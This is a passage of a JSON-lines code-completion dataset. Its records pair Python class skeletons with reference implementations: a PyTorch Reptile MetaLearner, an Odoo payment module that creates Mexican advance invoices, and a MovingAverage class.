"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:", "name": "pred", "signature": "def pred(self, support_x, support_y, query_x, query_y)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005262", "prompt": "Implement the Python class `MetaLearner` described below.\n\nClass description:\nAs we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\n\nMethod signatures and docstrings:\n- def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates): :param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\n- def write_grads(self, dummy_loss, sum_grads_pi): write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\n- def forward(self, support_x, support_y, query_x, query_y): Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\n- def pred(self, support_x, support_y, query_x, query_y): predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:", "prompted_full_text": "Implement the Python class `MetaLearner` described below.\n\nClass description:\nAs we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\n\nMethod signatures and docstrings:\n- def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates): :param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\n- def write_grads(self, dummy_loss, sum_grads_pi): write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\n- def forward(self, support_x, support_y, query_x, query_y): Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\n- def pred(self, support_x, support_y, query_x, query_y): predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\n\n<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n<|end_body_0|>\n\n<|body_start_1|>\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n<|end_body_1|>\n\n<|body_start_2|>\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n<|end_body_2|>\n\n<|body_start_3|>\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n<|end_body_3|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n <|body_0|>\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n <|body_1|>\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n <|body_2|>\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MetaLearner:\n \"\"\"As we have mentioned in Learner class, the metalearner class will receive a series of loss on different tasks/episodes on theta_pi network, and it will merage all loss and then sum over it. The summed loss will be backproped on theta network to update theta parameters, which is the initialization point we want to find.\"\"\"\n\n def __init__(self, net_cls, net_cls_args, n_way, k_shot, meta_batchsz, beta, num_updates):\n \"\"\":param net_cls: class, not instance. the class of specific Network for learner :param net_cls_args: tuple, args for net_cls, like (n_way, imgsz) :param n_way: :param k_shot: :param meta_batchsz: number of tasks/episode :param beta: learning rate for meta-learner :param num_updates: number of updates for learner\"\"\"\n super(MetaLearner, self).__init__()\n self.n_way = n_way\n self.k_shot = k_shot\n self.meta_batchsz = meta_batchsz\n self.beta = beta\n self.num_updates = num_updates\n self.learner = Learner(net_cls, *net_cls_args)\n self.optimizer = optim.Adam(self.learner.parameters(), lr=beta)\n\n def write_grads(self, dummy_loss, sum_grads_pi):\n \"\"\"write loss into learner.net, gradients come from sum_grads_pi. Since the gradients info is not calculated by general backward, we need this function to write the right gradients into theta network and update theta parameters as wished. :param dummy_loss: dummy loss, nothing but to write our gradients by hook :param sum_grads_pi: the summed gradients :return:\"\"\"\n hooks = []\n for i, v in enumerate(self.learner.parameters()):\n\n def closure():\n ii = i\n return lambda grad: sum_grads_pi[ii]\n hooks.append(v.register_hook(closure()))\n self.optimizer.zero_grad()\n dummy_loss.backward()\n self.optimizer.step()\n for h in hooks:\n h.remove()\n\n def forward(self, support_x, support_y, query_x, query_y):\n \"\"\"Here we receive a series of episode, each episode will be learned by learner and get a loss on parameters theta. we gather the loss and sum all the loss and then update theta network. setsz = n_way * k_shotf querysz = n_way * k_shot :param support_x: [meta_batchsz, setsz, c_, h, w] :param support_y: [meta_batchsz, setsz] :param query_x: [meta_batchsz, querysz, c_, h, w] :param query_y: [meta_batchsz, querysz] :return:\"\"\"\n sum_grads_pi = None\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, grad_pi, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n if sum_grads_pi is None:\n sum_grads_pi = grad_pi\n else:\n sum_grads_pi = [torch.add(i, j) for i, j in zip(sum_grads_pi, grad_pi)]\n dummy_loss, _ = self.learner.net_forward(support_x[0], support_y[0])\n self.write_grads(dummy_loss, sum_grads_pi)\n return accs\n\n def pred(self, support_x, support_y, query_x, query_y):\n \"\"\"predict for query_x :param support_x: :param support_y: :param query_x: :param query_y: :return:\"\"\"\n meta_batchsz = support_y.size(0)\n accs = []\n for i in range(meta_batchsz):\n _, _, episode_acc = self.learner(support_x[i], support_y[i], query_x[i], query_y[i], self.num_updates)\n accs.append(episode_acc)\n return np.array(accs).mean()\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_dragen1860_Reptile_Pytorch.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "3353011ceb206cca6b112b49fc4233530f4fcdee", "bodies": ["for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\nreturn super(AccountPayment, self).post()", "self.ensure_one()\nif self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\nmessages = []\ncompany = self.company_id\nif not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\nif not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\naml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\npartner = self.partner_id._find_accounting_partner(self.partner_id)\ndebit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\nlines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\ndebt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\nif debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\nif not messages:\n return self.payment_difference or debt or amount\nself.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\nreturn False", "advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\nadvance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\nself.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\nadvance.date_invoice = self.payment_date\nctx = {'disable_after_commit': True}\nadvance.with_context(**ctx).action_post()\nif advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\nself.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\nadvance.button_cancel()\nadvance.button_draft()\nreturn advance"], "bodies_text": "<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "class_docstring": "", "class_name": "AccountPayment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000167", "length_bytes": 4664, "license_type": "no_license", "methods": [{"docstring": "Inherit to create the advance when is necessary", "name": "post", "signature": "def post(self)"}, {"docstring": "Verify that the configuration necessary to create the advance invoice is complete.", "name": "l10n_mx_edi_advance_is_required", "signature": "def l10n_mx_edi_advance_is_required(self, amount)"}, {"docstring": "Return if with the payment must be created the invoice for the advance", "name": "_l10n_mx_edi_generate_advance", "signature": "def _l10n_mx_edi_generate_advance(self, amount)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004813", "prompt": "Implement the Python class `AccountPayment` described below.\n\nClass description:\nImplement the AccountPayment class.\n\nMethod signatures and docstrings:\n- def post(self): Inherit to create the advance when is necessary\n- def l10n_mx_edi_advance_is_required(self, amount): Verify that the configuration necessary to create the advance invoice is complete.\n- def _l10n_mx_edi_generate_advance(self, amount): Return if with the payment must be created the invoice for the advance", "prompted_full_text": "Implement the Python class `AccountPayment` described below.\n\nClass description:\nImplement the AccountPayment class.\n\nMethod signatures and docstrings:\n- def post(self): Inherit to create the advance when is necessary\n- def l10n_mx_edi_advance_is_required(self, amount): Verify that the configuration necessary to create the advance invoice is complete.\n- def _l10n_mx_edi_generate_advance(self, amount): Return if with the payment must be created the invoice for the advance\n\n<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n<|end_body_0|>\n\n<|body_start_1|>\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n<|end_body_2|>\n", "revision_id": "b57f714b83d55110003998c7ad276e5076c7ecd8", "skeleton": "<|skeleton|>\nclass AccountPayment:\n\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n <|body_0|>\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n <|body_1|>\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccountPayment:\n def post(self):\n \"\"\"Inherit to create the advance when is necessary\"\"\"\n for rec in self:\n amount = rec.amount * (1 if rec.payment_type in ('outbound', 'transfer') else -1)\n is_required = rec.l10n_mx_edi_advance_is_required(amount)\n if is_required:\n rec._l10n_mx_edi_generate_advance(is_required)\n return super(AccountPayment, self).post()\n\n def l10n_mx_edi_advance_is_required(self, amount):\n \"\"\"Verify that the configuration necessary to create the advance invoice is complete.\"\"\"\n self.ensure_one()\n if self.payment_type != 'inbound' or (self.invoice_ids and self.payment_difference >= 0) or self.company_id.country_id != self.env.ref('base.mx'):\n return False\n messages = []\n company = self.company_id\n if not company.l10n_mx_edi_product_advance_id:\n messages.append(_('The product that must be used in the advance invoice line is not configured in the accounting settings.'))\n if not company.l10n_mx_edi_journal_advance_id:\n messages.append(_('The journal that must be used in the advance invoice is not configured in the accounting settings.'))\n aml = self.env['account.move.line'].with_context(check_move_validity=False, date=self.payment_date)\n partner = self.partner_id._find_accounting_partner(self.partner_id)\n debit, credit, _amount_currency, _currency_id = aml._compute_amount_fields(amount, self.currency_id, self.company_id.currency_id)\n lines = self.env['account.move.line'].read_group([('partner_id', '=', partner.id), ('account_id', '=', partner.property_account_receivable_id.id), ('move_id.state', '=', 'posted')], ['debit', 'credit'], 'partner_id')\n debt = company.currency_id.round(lines[0]['debit'] + debit - (lines[0]['credit'] + credit)) if lines else 0.0\n if debt > 0:\n messages.append(_('This payment do not generate advance because the customer has invoices with pending payment.'))\n if not messages:\n return self.payment_difference or debt or amount\n self.message_post(body=_('This record cannot create the advance document automatically for the next reason: %sFor this record, you need create the invoice manually and reconcile it with this payment or cancel and validate again after that the data was completed.') % create_list_html(messages))\n return False\n\n def _l10n_mx_edi_generate_advance(self, amount):\n \"\"\"Return if with the payment must be created the invoice for the advance\"\"\"\n advance = self.env['account.move'].advance(self.env['res.partner']._find_accounting_partner(self.partner_id), abs(amount), self.currency_id)\n advance.message_post_with_view('mail.message_origin_link', values={'self': advance, 'origin': self}, subtype_id=self.env.ref('mail.mt_note').id)\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance_created', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.date_invoice = self.payment_date\n ctx = {'disable_after_commit': True}\n advance.with_context(**ctx).action_post()\n if advance.l10n_mx_edi_pac_status == 'signed':\n self.invoice_ids = [(4, advance.id)]\n advance._compute_cfdi_values()\n return advance\n self.message_post_with_view('l10n_mx_edi_advance.l10n_mx_edi_message_advance', values={'self': self, 'origin': advance}, subtype_id=self.env.ref('mail.mt_note').id)\n advance.button_cancel()\n advance.button_draft()\n return advance\n", "source": "the_stack_v2_python_sparse", "source_path": "l10n_mx_edi_advance/models/account_payment.py", "source_repo": "tate11/quemendev", "split": "test", "star_events_count": 0} {"blob_id": "6729dc202743738c0a7e77cfabd18ed7dc3727c2", "bodies": ["self.array = [None for _ in range(size)]\nself.i = 0\nself.total = 0", "if self.array[self.i] is not None:\n self.total -= self.array[self.i]\nself.total += val\nself.array[self.i] = val\nself.i = (self.i + 1) % len(self.array)\ncount = len(self.array)\nif self.array[-1] is None:\n count = self.i\nreturn self.total / float(count)"], "bodies_text": "<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MovingAverage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000168", "length_bytes": 1359, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here. :type size: int", "name": "__init__", "signature": "def __init__(self, size)"}, {"docstring": ":type val: int :rtype: float", "name": "next", "signature": "def next(self, val)"}], "n_methods": 2, "prompt": "Implement the Python class `MovingAverage` described below.\n\nClass description:\nImplement the MovingAverage class.\n\nMethod signatures and docstrings:\n- def __init__(self, size): Initialize your data structure here. :type size: int\n- def next(self, val): :type val: int :rtype: float", "prompted_full_text": "Implement the Python class `MovingAverage` described below.\n\nClass description:\nImplement the MovingAverage class.\n\nMethod signatures and docstrings:\n- def __init__(self, size): Initialize your data structure here. :type size: int\n- def next(self, val): :type val: int :rtype: float\n\n<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n<|end_body_1|>\n", "revision_id": "05e0beff0047f0ad399d0b46d625bb8d3459814e", "skeleton": "<|skeleton|>\nclass MovingAverage:\n\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n <|body_0|>\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", 